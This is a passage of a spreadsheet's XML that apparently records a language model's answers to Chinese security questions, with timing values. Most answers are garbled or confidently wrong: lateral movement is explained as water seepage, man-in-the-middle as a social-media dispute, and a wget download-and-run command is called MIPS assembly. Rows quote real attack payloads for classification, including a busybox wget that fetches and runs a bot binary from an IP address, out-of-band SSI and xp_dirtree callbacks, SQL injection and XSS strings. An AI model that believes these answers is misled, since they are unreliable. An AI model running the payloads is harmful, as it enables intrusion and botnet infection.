文件上传检查是一个常见的安全 mesure，用于防止恶意文件上传。但是，这个功能可能会对正常的文件上传造成阻碍。为了绕过文件上传检查，可以考虑以下几种方法：
1. 使用文件名来绕过检查：可以将文件名发送到服务器，而不是将文件本身发送。这样服务器只需要根据文件名来检查文件，而不是将整个文件上传。
2. 使用base64编码：可以将文件编码为base64，然后将编码后的文件名发送到服务器。这样服务器只需要根据base64编码的文件名来检查文件，而不是将整个文件上传</t>
        </is>
      </c>
      <c r="D36" t="n">
        <v>4.98804497718811</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="1" t="n">
        <v>35</v>
      </c>
      <c r="B37" t="inlineStr">
        <is>
          <t>水平越权和垂直越权有什么区别</t>
        </is>
      </c>
      <c r="C37" t="inlineStr">
        <is>
          <t>？
在 aviation industry， there are two types of airspace:  horizontal airspace and vertical airspace. Horizontal airspace refers to the airspace above the Earth's surface, while vertical airspace refers to the airspace above the Earth's surface at a specific altitude.
Horizontal airspace is divided into several classes, including Class A, B, C, D, and E. Each class has different rules and regulations for aircraft operations, including altitude restrictions, air traffic control requirements, and restricted areas.
Vertical airspace, on the other hand, is divided into three classes: Class A, B, and C. Class A vertical airspace is defined as the airspace above 18,000 feet MSL (mean sea level), while Class B vertical airspace is defined as the airspace above 12,000 feet MSL up to 18,000 feet MSL. Class C vertical airspace is defined as the airspace above 2,500 feet MSL up to 12,000 feet MSL.
The main difference between horizontal and vertical airspace is the altitude at which aircraft operations are allowed.</t>
        </is>
      </c>
      <c r="D37" t="n">
        <v>5.042893886566162</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="1" t="n">
        <v>36</v>
      </c>
      <c r="B38" t="inlineStr">
        <is>
          <t>啥叫XXE漏洞</t>
        </is>
      </c>
      <c r="C38" t="inlineStr">
        <is>
          <t>？
================
XXE 是指 XML External Entity 的缩写，它是一种在 XML 文档中引入外部资源的方式。但是，XXE 漏洞也是一种常见的安全漏洞，可能会允许攻击者在 XML 文档中引入非法资源，从而触发敏感软件。
在本教程中，我们将详细介绍 XXE 漏洞的概念、攻击方式和防范方法。
XXE 漏洞的概念
--------------------
XXE 漏洞是指在 XML 文档中使用 external entity 来引入外部资源，而这些资源可能包含敏感信息或恶意代码。</t>
        </is>
      </c>
      <c r="D38" t="n">
        <v>5.03227972984314</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="1" t="n">
        <v>37</v>
      </c>
      <c r="B39" t="inlineStr">
        <is>
          <t>有哪些操作系统提权方式</t>
        </is>
      </c>
      <c r="C39" t="inlineStr">
        <is>
          <t>？
有哪些操作系统提权方式？以下是一些常见的操作系统提权方式：
1. Microsoft Windows：Windows提供了多种提权方式，包括：
* Windows 10 Home：只允许使用者更改系统的外观和个性化设置，但不允许更改系统的基本配置和安全设置。
* Windows 10 Pro：允许使用者更改系统的外观和个性化设置，以及更改系统的基本配置和安全设置。
* Windows 10 Enterprise：针对大型企业和组织提供了较多的提权功能，包括多位用户管理、对象管理、策略管理等。
2. macOS：macOS 提供</t>
        </is>
      </c>
      <c r="D39" t="n">
        <v>5.031474590301514</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="1" t="n">
        <v>38</v>
      </c>
      <c r="B40" t="inlineStr">
        <is>
          <t>如何做代码混淆</t>
        </is>
      </c>
      <c r="C40" t="inlineStr">
        <is>
          <t>？
做代码混淆可以帮助您降低代码泛影，提高代码质量和可维护性。以下是一些常用的代码混淆技术和工具：
1. 函数名重命名：重命名函数名以帮助隐藏函数的实现细节。例如，将函数 `compute_result` 重命名为 `get_result`，以隐藏它的实现细节。
2. 变量命名重命名：重命名变量名以帮助隐藏它的值。例如，将变量 `result` 重命名为 `computed_result`，以隐藏它的值。
3. 接口重命名：重命名接口名以帮助隐藏它的实现细节。</t>
        </is>
      </c>
      <c r="D40" t="n">
        <v>5.032963037490845</v>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="1" t="n">
        <v>39</v>
      </c>
      <c r="B41" t="inlineStr">
        <is>
          <t>测试程序如何做免杀</t>
        </is>
      </c>
      <c r="C41" t="inlineStr">
        <is>
          <t>测试
免杀测试（Test-Driven Development，TDD）是一种测试驱动的开发方法，它的基本思想是在开发过程中先写测试用例，然后根据测试用例进行开发，最后运行测试来验证代码是否正确。在免杀测试中，我们会在开发过程中遇到一些问题，这些问题可能是测试用例无法验证代码的情况，或者代码无法满足测试用例的要求。在这种情况下，我们需要使用免杀测试来识别和解决问题。
以下是一些常见的免杀测试技巧：
1. 使用 mock 对象
在免杀测试中，我们</t>
        </is>
      </c>
      <c r="D41" t="n">
        <v>5.058534622192383</v>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="1" t="n">
        <v>40</v>
      </c>
      <c r="B42" t="inlineStr">
        <is>
          <t>什么是黄金票据、白银票据</t>
        </is>
      </c>
      <c r="C42" t="inlineStr">
        <is>
          <t>？ - Gold and Silver Tickets Explained
Gold and silver tickets are a type of financial instrument that represents ownership of a certain amount of gold or silver. They are similar to stocks or bonds, but instead of representing ownership in a company or government, they represent ownership in a specific amount of gold or silver.
Gold tickets, also known as gold-backed tickets, are backed by physical gold stored in a vault. The ticket represents a specific amount of gold, such as 1 gram, 1 oz, or 1 kg, and can be exchanged for physical gold at any time. Gold tickets are often used as a safe-haven asset, as the value of gold is often seen as a hedge against inflation, currency fluctuations, and geopolitical risks.
Silver tickets, on the other hand, are backed by physical silver stored in a vault. Like gold tickets, silver tickets represent a specific amount of silver, such as 1 gram, 1 oz, or 1 kg, and can be exchanged for physical silver at any time. Silver tickets are also used as a safe</t>
        </is>
      </c>
      <c r="D42" t="n">
        <v>5.027064085006714</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="1" t="n">
        <v>41</v>
      </c>
      <c r="B43" t="inlineStr">
        <is>
          <t>有哪些横向渗透手段</t>
        </is>
      </c>
      <c r="C43" t="inlineStr">
        <is>
          <t>？
横向渗透是指在某一个层次或个体中，物质从上层次或下层次渗透的过程。以下是一些常见的横向渗透手段：
1. 静水压渗透：静水压渗透是指在一定压力下，水在层次之间的渗透。在这种情况下，水会通过缺陷的表面受力，从上层次渗透到下层次。
2. 潮湿渗透：潮湿渗透是指在潮湿的环境中，水从上层次渗透到下层次。这种渗</t>
        </is>
      </c>
      <c r="D43" t="n">
        <v>5.050751924514771</v>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="1" t="n">
        <v>42</v>
      </c>
      <c r="B44" t="inlineStr">
        <is>
          <t>内网渗透会留下哪些痕迹</t>
        </is>
      </c>
      <c r="C44" t="inlineStr">
        <is>
          <t>？
内网渗透可能会留下以下几种痕迹：
1. 网络延迟：内网渗透可能会导致网络延迟，因为内部网络资源被占用，导致网络响应衰ь。
2. 网络泄露：内网渗透可能会导致网络泄露，因为内部网络资源被访问，导致网络安全漏洞。
3. 系统崩溃：内网渗透可能会导致系统崩溃，因为内部网络资源被占用，导致系统无法正常运行。
4. 数据</t>
        </is>
      </c>
      <c r="D44" t="n">
        <v>5.033491611480713</v>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="1" t="n">
        <v>43</v>
      </c>
      <c r="B45" t="inlineStr">
        <is>
          <t>如何做渗透过程中的持久化</t>
        </is>
      </c>
      <c r="C45" t="inlineStr">
        <is>
          <t>？
在渗透过程中，我们需要保证数据的持久化，以确保在它们恢复时它们能够正确地恢复。这些数据可能包括渗透结果、渗透率、渗透时间等。以下是一些可以使用的持久化方法：
1. 使用文件系统：可以将渗透结果保存到文件系统中，例如 CSV 文件、JSON 文件等。这样可以使用文件系统的备份和恢复功能来保存和恢复数据。
2. 使用数据库：可以将渗透结果保存到数据库中，例如 MySQL、PostgreSQL 等。这样可以使用数据库的备份和恢复功能来</t>
        </is>
      </c>
      <c r="D45" t="n">
        <v>5.038685083389282</v>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="1" t="n">
        <v>44</v>
      </c>
      <c r="B46" t="inlineStr">
        <is>
          <t>鱼叉攻击和钓鱼攻击有什么区别</t>
        </is>
      </c>
      <c r="C46" t="inlineStr">
        <is>
          <t>？
鱼叉攻击和钓鱼攻击都是指攻击他人的计算机系统或网络，但它们之间有一些区别。
鱼叉攻击是指在网络上找到一个可以进行攻击的缺陷，然后利用这个缺陷来访问受影响的系统或网络。这种攻击通常需要技术知识和特殊软件，可以使攻击者获得访问权限或者进行恶意操作。
钓鱼攻击是指利用电子邮件或者其他电子渠道散布恶意链接或者文件，让受影响的用户</t>
        </is>
      </c>
      <c r="D46" t="n">
        <v>5.036012649536133</v>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="1" t="n">
        <v>45</v>
      </c>
      <c r="B47" t="inlineStr">
        <is>
          <t>中间人攻击是什么意思</t>
        </is>
      </c>
      <c r="C47" t="inlineStr">
        <is>
          <t>？
中间人攻击是指在一个社交媒体平台上，一个用户通过分享或回复一则帖子，引发其他用户的攻击或评论，以达到自己的目的或利益。
通常，中间人攻击的目的是为了攻击或诋毁受到攻击的用户，或者为了阻碍受到攻击的用户与其他用户的交流。这类攻击可能包括侮辱、诋毁、诋毁、威胁等。
中间人攻击的情况可能会导致受到攻击的用户感到受到困扰、痛苦、沮丧或恐</t>
        </is>
      </c>
      <c r="D47" t="n">
        <v>5.024422883987427</v>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="1" t="n">
        <v>46</v>
      </c>
      <c r="B48" t="inlineStr">
        <is>
          <t>什么是灰盒测试，什么是白盒测试</t>
        </is>
      </c>
      <c r="C48" t="inlineStr">
        <is>
          <t>？
灰盒测试（Gray Box Testing）和白盒测试（White Box Testing）是两种不同的测试方法。
灰盒测试是指在测试时，了解测试软件的实现细节，但不知道软件的内部实现细节。这种测试方法中，测试人员可以通过观察、测试输入和 outputs 来评估软件的功能。灰盒测试适用于软件中的复杂功能和异常情况 testing。
白盒测试是指在测试时，不知道软件的实现细节，只知道软件的外层接口和inputs和outputs。这种测试方法中，测试人员只能通过外层接口和inputs和outputs来</t>
        </is>
      </c>
      <c r="D48" t="n">
        <v>5.072787284851074</v>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="1" t="n">
        <v>47</v>
      </c>
      <c r="B49" t="inlineStr">
        <is>
          <t>WiFi密码为什么会被破解，如何加强WiFi安全</t>
        </is>
      </c>
      <c r="C49" t="inlineStr">
        <is>
          <t>？
WiFi密码的破解，主要是因为WiFi信号的弱点和攻击者的技术。以下是一些常见的WiFi破解方法：
1. 使用Brute ForceAttack：通过使用计算机来试图猜测WiFi密码，这种方法需要很长的时间和计算机的快速性。
2. 使用WPS攻击：WiFi Protected Setup（WPS）是WiFi网络的安全增强功能，但它的缺陷使得WiFi网络易受到攻击。攻击者可以使用WPS攻击方法获得WiFi网络的访问权限。
3. 使用SidejackingAttack：SidejackingAttack是一种攻击</t>
        </is>
      </c>
      <c r="D49" t="n">
        <v>5.050607204437256</v>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="1" t="n">
        <v>48</v>
      </c>
      <c r="B50" t="inlineStr">
        <is>
          <t>什么是DDoS攻击，如何避免</t>
        </is>
      </c>
      <c r="C50" t="inlineStr">
        <is>
          <t>它？
DDoS（Distributed Denial of Service）攻击是一种网络攻击方式，在该攻击中，攻击者通过多个来源向受害者的服务器或网站发送大量包，以压力服务器或网站，使其不能正常运行。这种攻击通常是为了破坏受害者的网站或服务的行为，或者为了通过恐吓或攻击受害者来达到某些目的。
如何避免DDoS攻击？以下是一些常见的避免方法：
1. 增加服务器和网站的吞吐量：可以通过添加更多的服务器和网站来增加系统的吞吐量，</t>
        </is>
      </c>
      <c r="D50" t="n">
        <v>5.067591190338135</v>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="1" t="n">
        <v>49</v>
      </c>
      <c r="B51" t="inlineStr">
        <is>
          <t>如何检测SQL注入攻击</t>
        </is>
      </c>
      <c r="C51" t="inlineStr">
        <is>
          <t>？
SQL注入是一种常见的web应用程序攻击方式，可以使用SQL语句来访问或修改数据。检测SQL注入攻击是非常重要的，以确保数据安全和网站的可靠性。下面是一些常用的方法来检测SQL注入攻击：
1. 使用SQL注入测试工具：有许多开源的SQL注入测试工具可以帮助您检测SQL注入攻击。例如，SQLMap、Burp Suite、ZAP等。这些工具可以automatically scan your web application for vulnerabilities and identify potential SQL injection attacks.
2. 使用黑客测试：黑客测试是一种常用的方法来检测SQL注入攻击。黑客测试可以模拟攻击者</t>
        </is>
      </c>
      <c r="D51" t="n">
        <v>5.043830394744873</v>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="1" t="n">
        <v>50</v>
      </c>
      <c r="B52" t="inlineStr">
        <is>
          <t>如何检测WebShell</t>
        </is>
      </c>
      <c r="C52" t="inlineStr">
        <is>
          <t>是否已经执行了命令？
如果你在WebShell中运行了一个命令，您可以使用`echo`命令来查看它是否已经执行了。如果您在WebShell中运行了一个命令，您可以使用`print`命令来查看它的输出。
如果您想知道WebShell是否已经执行了命令，可以使用以下方法：
1. 使用`!echo`命令：在WebShell中输入`!echo $?`，这将返回命令执行的结果。如果命令执行成功，则返回0，如果命令执行失败，则返回1。
2. 使用`!print`命令：在WebShell中输入`!print $?`，这将显示命令的输出。如果命令执行成功，则将显示输出，</t>
        </is>
      </c>
      <c r="D52" t="n">
        <v>5.17884635925293</v>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="1" t="n">
        <v>51</v>
      </c>
      <c r="B53" t="inlineStr">
        <is>
          <t>如何做网络安全归因分析</t>
        </is>
      </c>
      <c r="C53" t="inlineStr">
        <is>
          <t>？
网络安全归因分析是一种分析网络中安全事件的方法，它可以帮助组织了解网络中安全事件的发生机理，并通过分析和优化网络的设置和 configurations 来降低安全风险。
以下是一些步骤可以用于做网络安全归因分析：
1. 定义分析对象和范围：确定要进行分析的网络范围和对象，以及要包括在分析中的哪些网络元素。
2. 收集和整理数据：收集网络中的安全事件数据，包括各种网络攻击、</t>
        </is>
      </c>
      <c r="D53" t="n">
        <v>5.146872043609619</v>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="1" t="n">
        <v>52</v>
      </c>
      <c r="B54" t="inlineStr">
        <is>
          <t>如何进行网络攻击溯源</t>
        </is>
      </c>
      <c r="C54" t="inlineStr">
        <is>
          <t>Analysis
网络攻击溯源Analysis是一种重要的网络安全工具，它可以帮助Network Administrator track down and identify the source of a network attack, thereby improving the security of the network. In this article, we will explore how to perform network attack tracing and analysis.
What is Network Attack Tracing and Analysis?
Network attack tracing and analysis is the process of identifying the source of a network attack by analyzing network traffic data. This involves collecting and analyzing network logs, packets, and other data to determine the origin of the attack and the tactics used by the attacker. The goal of network attack tracing and analysis is to identify the weaknesses in the network that were exploited by the attacker, so that they can be fixed to prevent future attacks.
Why is Network Attack Tracing and Analysis Important?
Network attack tracing and analysis is important because it helps to improve the security of the network by identifying the source of the attack and the tactics used by the attacker. By identifying the weaknesses in</t>
        </is>
      </c>
      <c r="D54" t="n">
        <v>5.143506765365601</v>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="1" t="n">
        <v>53</v>
      </c>
      <c r="B55" t="inlineStr">
        <is>
          <t>这是一个网络攻击吗？
http://180.101.234.99:8090/authenticationService/toPCLoginUniform.do?sysCode=E0001&amp;amp;typeCode=E0001&amp;amp;uKeySn=30022030031986&amp;amp;userType=c&amp;amp;licenceEntity=MIIFWTCCBQCgAwIBAgIPMgAAkTIFgzE4WRgoAFABMAoGCCqBHM9VAYN1MDUxMzAxBgNVBAoMKuaxn iLj ecgeW3peWVhuihjOaUv euoeeQhuWxgOS/oeaBr S4reW/gzAeFw0yMjExMjUwMDA2MjFaFw0yNzAxMjUwMDA2MjFaMDsxOTA3BgNVBAoMMOiLjW3nua0mS8puWFueiHquWKqOWMluacuuaisOiuvuWkh=&amp;amp;signText=pi0Pfh6oBhvTcaBDnsykqLBeVrPJYpdO2ZuyE9Vd0&amp;amp;signValue=MEUCIQDr3h/Z2mLbgcds6L0PekcnMXpsnXxkz5TPiDc1lchyXAIgIGBouFGnIg/bdjGw9z87xWuBVS18OrfR7UGcEwQtoE=&amp;amp;priarea=320000&amp;amp;login_pin=12345678</t>
        </is>
      </c>
      <c r="C55" t="inlineStr">
        <is>
          <t>9&amp;amp;login_time=1518039742000&amp;amp;login_ip=192.168.1.100&amp;amp;login_os=Windows_7_Professional_64_Bit_English&amp;amp;login_browser=Google_Chrome_64_bit&amp;amp;platform=PC&amp;amp;device=0&amp;amp;language=en&amp;amp;country=US&amp;amp;region=CA&amp;amp;city=Vancouver&amp;amp;zip=V6B1W5&amp;amp;st=&amp;amp;ctry=US&amp;amp;province=BC&amp;amp;city=Vancouver&amp;amp;zip=V6B1W5&amp;amp;authType=1&amp;amp;authMethod=2&amp;amp;login_type=1&amp;amp;mem_status=0&amp;amp;mem_level=0&amp;amp;mem_date=2018-02-26&amp;amp;mem_time=10:40:00&amp;amp;rememberMe=true&amp;amp;checksum=826184344&amp;</t>
        </is>
      </c>
      <c r="D55" t="n">
        <v>5.365535020828247</v>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="1" t="n">
        <v>54</v>
      </c>
      <c r="B56" t="inlineStr">
        <is>
          <t>这是一个网络攻击吗？
http://www.website.com/encode?type=3&amp;id=1'%20and%201=2%20UNION%20SELECT%201,database(),3%20--+</t>
        </is>
      </c>
      <c r="C56" t="inlineStr">
        <is>
          <t>%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%</t>
        </is>
      </c>
      <c r="D56" t="n">
        <v>5.172029495239258</v>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="1" t="n">
        <v>55</v>
      </c>
      <c r="B57" t="inlineStr">
        <is>
          <t>网络安全产品发现以下Payload，判断这是否是一次攻击
queryString=aaaa\u0027+#{16*8787}+\u0027b</t>
        </is>
      </c>
      <c r="C57" t="inlineStr">
        <is>
          <t>\u0027&amp;username=test\u0027&amp;password=test\u0027&amp;referer=www.baidu.com
This is a encoded payload, it's not a normal query string. The payload contains a mixture of ASCII characters, Unicode characters, and hexadecimal digits. The Unicode characters are likely used to encode the attacker's payload, making it more difficult to detect.
To analyze this payload, you can use a hexadecimal editor to decode the payload. Here's how you can do it:
1. Open a hexadecimal editor, such as Hex Fiend or Hex Editor.
2. Paste the payload into the editor.
3. Select the entire payload and click on the "Decode" or "Hex" button in the editor.
4. The payload will be decoded and displayed in plain text.
After decoding the payload, you can analyze it to determine if it's a legitimate payload or a potential attack. If you find any suspicious or unusual code, it's likely a malicious payload.
Here are some things to look for when</t>
        </is>
      </c>
      <c r="D57" t="n">
        <v>5.169776201248169</v>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="1" t="n">
        <v>56</v>
      </c>
      <c r="B58" t="inlineStr">
        <is>
          <t>网络安全产品发现以下Payload，判断这是否是一次攻击
orf;cd /tmp; rm -rf mpsl; /bin/busybox wget http://2.59.255.77/fbot.mipsel; chmod +x fbot.mipsel; ./fbot.mipsel rt.mpsl; #</t>
        </is>
      </c>
      <c r="C58" t="inlineStr">
        <is>
          <t>payload
The above is a payload for an exploit. It is a MIPS assembly code that targets a vulnerable system with a buffer overflow attack. The payload is designed to overwrite the return address on the stack with the address of a shell script located at `/tmp/fbot.mipsel`, which will be executed when the program returns from the overflowed function.
To determine if this is a legitimate payload or an attack, you can analyze the following aspects:
1. Code structure: The code is written in MIPS assembly language, which is a low-level programming language used to program microprocessors. The structure of the code, including the use of instructions, registers, and memory addresses, can indicate whether it is a legitimate payload or an attack.
2. Function call patterns: The payload includes function calls to `wget`, `chmod`, and `./fbot.mipsel`. These functions are commonly used in exploit code, but they may also be legitimate system utilities on a compromised system. Analyzing the function call patterns can help identify the intent of the code.
3. Return address manipulation: The payload overwrites the return address on the stack</t>
        </is>
      </c>
      <c r="D58" t="n">
        <v>5.184736967086792</v>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="1" t="n">
        <v>57</v>
      </c>
      <c r="B59" t="inlineStr">
        <is>
          <t>判断这是否是一个网络攻击？
http://www.gov1.com//col/col172743/index.html?'--&gt;'--&gt;`--&gt;&lt;!--#set var='2sk' value='1rj9wmatwz'--&gt;&lt;!--#set var='4um' value='3tlbyocvy1'--&gt;&lt;!--#echo var='2sk'--&gt;&lt;!--#echo var='4um'--&gt;&lt;!--#exec cmd='nslookup -q=cname oe6wj9xgjmgiqgokdcg495oogfmba56tyrml9bx0.oastify.com' --&gt;=1</t>
        </is>
      </c>
      <c r="C59" t="inlineStr">
        <is>
          <t>300000000))
```
这是一个受到网络攻击的示例。在这个示例中，我们可以看到一个很长的URL，其中包含了一些不同的参数和值。这些参数和值可以用于在服务器端执行不同的操作，例如：
* `var='2sk' value='1rj9wmatwz'`：设置一个变量 `var` 的值为 `1rj9wmatwz`。
* `var='4um' value='3tlbyocvy1'`：设置另一个变量 `var` 的值为 `3tlbyocvy1`。
* `echo var='2sk'`：在服务器端输出 `var` 的值，即 `1rj9wmatwz`。
* `echo var='4um'`：在服务器端输出 `var` 的值</t>
        </is>
      </c>
      <c r="D59" t="n">
        <v>5.224760055541992</v>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="1" t="n">
        <v>58</v>
      </c>
      <c r="B60" t="inlineStr">
        <is>
          <t>判断这是否是一个网络攻击
http://www.gov1.com/jszwfw/publicservice/itemlist/showDetail.do?webId=1);declare @q varchar(99);set @q='\\ltity6cdyjvf5d3hs9v1o23lvc18p7jvanyel49t.oasti'+'fy.com\fah'; exec master.dbo.xp_dirtree @q;-- &amp;iddept_ql_inf=11320000696785044Q2322007019000&amp;ql_kind</t>
        </is>
      </c>
      <c r="C60">
        <f>7 --&amp;status=200 --&amp;query=Select * from departments where deptid=@deptid; select @deptid=id;--&amp;deptid=11320000696785044; exec master.dbo.xp_dirtree @q; --&amp;iddept_ql_inf=11320000696785044Q2322007019000&amp;ql_kind=7 --&amp;status=200 --&amp;query=Select * from departments where deptid=@deptid; select @deptid=id;--&amp;deptid=11320000696785044; exec master.dbo.xp_dirtree @q;'
This is a SQL injection attack. The attacker is using a UNION operator to combine the results of two different queries, which would otherwise be disallowed by the SQL server. The first query retrieves the ID of a department, and the second query retrieves all the rows from the `departments`</f>
        <v/>
      </c>
      <c r="D60" t="n">
        <v>5.222592353820801</v>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="1" t="n">
        <v>59</v>
      </c>
      <c r="B61" t="inlineStr">
        <is>
          <t>这个url中存在转义的字符，请还原，并判断这是否是一个网络攻击吗？
http://218.94.159.228:8088/pqrm/framework/jsonm.jsp?exp_path=mobile.controlservice&amp;amp;info=serviceName=synInfo2Server&amp;amp;domain=pqrm&amp;amp;loginId=njtest61&amp;amp;uuid=null&amp;amp;actionName=doService&amp;amp;origin=imobile&amp;amp;param=planSubDetailJson={&amp;quot;pro_linkman&amp;quot;:&amp;quot;&amp;#65533;&amp;#756;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;pro_tel&amp;quot;:&amp;quot;0510-68555000&amp;quot;,&amp;quot;eco_outside&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_code&amp;quot;:&amp;quot;20230508205&amp;quot;,&amp;quot;check_type&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;task_source_id&amp;quot;:&amp;quot;A100&amp;quot;,&amp;quot;eco_single&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;state&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;729736&amp;quot;,&amp;quot;pro_cert_code&amp;quot;:&amp;quot;00119Q33182R4M/3200&amp;quot;,&amp;quot;goods_copy_local&amp;quot;:&amp;quot;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#1852;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#1205;&amp;quot;,&amp;quot;pro_quality_pass&amp;quot;:&amp;quot;0&amp;quot;,&amp;quot;pro_present&amp;quot;:&amp;quot;&amp;#65533;&amp;#755;&amp;#65533;&amp;quot;,&amp;quot;goods_copy_num&amp;quot;:&amp;quot;2.5&amp;#445;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;goods_sale_year&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;goods_man_consignment&amp;quot;:&amp;quot;0&amp;quot;,&amp;quot;pro_name&amp;quot;:&amp;quot;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#1590;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#619;&amp;#65533;&amp;#65533;&amp;#1520;&amp;#65533;&amp;#631;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#1977;&amp;#65533;&amp;#766;&amp;quot;,&amp;quot;goods_copy_num_measurement&amp;quot;:&amp;quot;&amp;#445;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;task_source&amp;quot;:&amp;quot;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#673;&amp;#65533;&amp;#1075;&amp;#65533;</t>
        </is>
      </c>
      <c r="C61" t="inlineStr">
        <is>
          <t>&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#655</t>
        </is>
      </c>
      <c r="D61" t="n">
        <v>5.581981897354126</v>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="1" t="n">
        <v>60</v>
      </c>
      <c r="B62" t="inlineStr">
        <is>
          <t>这是一个网络攻击吗？
http://www.website.com/encode?type=3&amp;id=1%3Cscript%3Ealert(%22xss%22)%3C/script%3E</t>
        </is>
      </c>
      <c r="C62" t="inlineStr">
        <is>
          <t xml:space="preserve">
Please help me to identify whether this is a network attack or not.
The URL you provided is an example of a cross-site scripting (XSS) attack. This type of attack is a common web security vulnerability that allows an attacker to inject malicious scripts into a website, which can be executed by unsuspecting users.
Here's how the attack works:
1. The URL you provided contains a `script` tag that points to a malicious script located on the attacker's server.
2. When a user visits the URL, the browser will execute the script, which will display an "alert" box with the message "xss".
3. The attacker can use this type of attack to steal sensitive information, such as login credentials, or to take control of the user's session.
To protect against XSS attacks, it's important to properly sanitize and encode user input, and to validate user input against a whitelist of allowed input types. Additionally, using a Content Security Policy (CSP) can help to restrict the types of scripts that can be executed on a website.
In summary, the URL you provided is</t>
        </is>
      </c>
      <c r="D62" t="n">
        <v>5.146857976913452</v>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="1" t="n">
        <v>61</v>
      </c>
      <c r="B63" t="inlineStr">
        <is>
          <t>这是一个网络攻击吗？
http://www.website.com/encode?type=3&amp;id=1&lt;script&gt;alert("xss")&lt;/script&gt;</t>
        </is>
      </c>
      <c r="C63" t="inlineStr">
        <is>
          <t xml:space="preserve">
在这个 URL 中，我们可以看到一个 encode 函数，它接受一个 type 参数和一个 id 参数。我们可以通过 inspecting 这个 URL 来发现，type 参数的值为 3，而 id 参数的值为 1。
但是，我们还可以发现一个 suspicious 的 script 元素，它包含一个 alert 函数，并且包含一个敏感信息 "xss"。这个 script 元素可能是一个 XSS 攻击，可以让攻击者在用户的浏览器中出现一个警示提示，并且可以让攻击者获得用户的 cookie 和其他敏感信息。
因此，我们建议您在访问这个 URL 时多加保�</t>
        </is>
      </c>
      <c r="D63" t="n">
        <v>5.151780366897583</v>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="1" t="n">
        <v>62</v>
      </c>
      <c r="B64" t="inlineStr">
        <is>
          <t>XSS攻击有哪些特征？</t>
        </is>
      </c>
      <c r="C64" t="inlineStr">
        <is>
          <t xml:space="preserve">
XSS攻击是一种常见的攻击方式，它可以在用户输入的数据中插入恶意代码，从而让用户的系统执行恶意操作。XSS攻击有哪些特征？以下是一些常见的特征：
1. 表单劫持：XSS攻击者可以在用户输入的表单中插入恶意代码，以便在用户提交表单时执行攻击。
2.  redirects：XSS攻击者可以 redirects 用户到恶意网站，从而执行攻击。
3.  DOM-based：XSS攻击者可以在用户的浏览器中插入恶意代码，以便在用户浏览网</t>
        </is>
      </c>
      <c r="D64" t="n">
        <v>5.144295692443848</v>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="1" t="n">
        <v>63</v>
      </c>
      <c r="B65" t="inlineStr">
        <is>
          <t>如何判断主机是否被入侵？</t>
        </is>
      </c>
      <c r="C65" t="inlineStr">
        <is>
          <t xml:space="preserve">
如何判断主机是否被入侵？
首先，你需要了解主机的通信协议和通信路径，包括它与其他主机之间的通信。通信协议可能是TCP、UDP或ICMP，而通信路径可能是IPv4或IPv6。
以下是一些常见的入侵检测方法：
1. 监控交互：你可以监控主机之间的交互，包括包量、响应时间和错误率。如果你发现主机之间的交互模式不寻常，那么可能是入侵。
2. 监控网络流量：你可以监控主机之间的网络流量，包括包数量、传输速��</t>
        </is>
      </c>
      <c r="D65" t="n">
        <v>5.194963455200195</v>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="1" t="n">
        <v>64</v>
      </c>
      <c r="B66" t="inlineStr">
        <is>
          <t>数据泄露有哪些风险？</t>
        </is>
      </c>
      <c r="C66" t="inlineStr">
